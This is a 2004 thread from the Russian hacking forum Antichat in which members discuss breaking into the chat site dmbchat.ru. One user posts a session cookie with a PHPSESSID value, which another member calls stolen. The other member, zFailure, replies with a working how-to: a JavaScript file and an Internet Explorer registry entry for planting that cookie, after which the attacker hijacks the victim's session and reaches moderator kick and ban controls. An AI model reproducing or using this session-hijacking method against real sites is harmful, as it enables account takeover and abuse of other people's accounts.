ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.06.2004, 19:08
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Интересный чат...по http://www.dmbchat.ru
но чет не фига не хочеться....точнее не получаеться что либо с ним сделать....хелп ми....могу подробнее выложить чего с ним делал!
 
Ответить с цитированием

  #2  
Старый 21.06.2004, 21:05
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию

 
Ответить с цитированием

  #3  
Старый 22.06.2004, 01:22
Аватар для Легионер
Легионер
Новичок
Регистрация: 22.06.2004
Сообщений: 11
Провел на форуме:
0

Репутация: 0
Отправить сообщение для Легионер с помощью ICQ
По умолчанию

хм....ссылка конешно интересная....но только там по существу что то маловато....
 
Ответить с цитированием

  #4  
Старый 22.06.2004, 01:25
Аватар для Легионер
Легионер
Новичок
Регистрация: 22.06.2004
Сообщений: 11
Провел на форуме:
0

Репутация: 0
Отправить сообщение для Легионер с помощью ICQ
По умолчанию

и очень интересно вот с этим мона ченить сделать или ???REFERER=http://www.dmbchat.ru/main.php QUERY=PHPSESSID=21e69ff01b652ede26addb84d58b9c17; b=b; counter=1480713
 
Ответить с цитированием

  #5  
Старый 22.06.2004, 11:36
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Легионер @ июня 22 2004,01:25)</td></tr><tr><td id="QUOTE">и очень интересно вот с этим мона ченить сделать или ???REFERER=http://www.dmbchat.ru/main.php QUERY=PHPSESSID=21e69ff01b652ede26addb84d58b9c17; b=b; counter=1480713[/QUOTE]<span id='postcolor'>
я думал на antichat.ru не ходят ламаки которым надо объеснять что делать с украдеными куками! (тока без обид)
 
Ответить с цитированием

  #6  
Старый 22.06.2004, 14:22
Аватар для Легионер
Легионер
Новичок
Регистрация: 22.06.2004
Сообщений: 11
Провел на форуме:
0

Репутация: 0
Отправить сообщение для Легионер с помощью ICQ
По умолчанию

ну на счет ламака это в тему...обьясни пожалуйста...ты же и сам когда то этого не знал...не губи...
 
Ответить с цитированием

  #7  
Старый 23.06.2004, 08:56
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию

ЕСЛИ КТО-ТО НЕ ЗНАЕТ ЧТО ДЕЛАТЬ С КУКАМИ ДАЮ СВОЙ СОВЕТ!

создаем файл c:\cookie.html
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">&lt; script type="text/javascript">
var xWin = external.menuArguments;
var xDoc = xWin.document;
var xSetCookie = prompt('Set-Cookie', 'you_are1=cacked1; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;');
if (xSetCookie) xDoc.cookie = xSetCookie;
//alert(xDoc.cookie);
</script>[/QUOTE]<span id='postcolor'>

создаем ключ в реестре
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Set-Cookie]
@="c:\\cookie.html"
[/QUOTE]<span id='postcolor'>

заходим на сайт (IE необходимо запустить заново)
в нужном фрейме открываем контекстное меню IE и выбираем наш только что созданный элемент &quot;cookie&quot;

в открывшемся диалоге изменяем you_are1 на нужное значение переменной (например: PHPSESSID), cacked1 на нужное значение переменной (например: 21e69ff01b652ede26addb84d58b9c17)

после этого жмем OK, а потом обновить этот фрейм (или весь чат, если это не приведет к выкидыванию вас из чата)

теперь для проверке открываем страничку ваших настроек/инфо и с ужасом обнаруживаем что там указан не ваш НИК =)

при удаче в модерке вместо надписи &quot;Вам некем управлять&quot; (или что-то вроде этого) появитсясписок людей и кнопочки &quot;Kick&quot; и &quot;Ban&quot; рядом с каждым =)

по крайней мере так у меня было в dmbchat.ru :D

GL
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ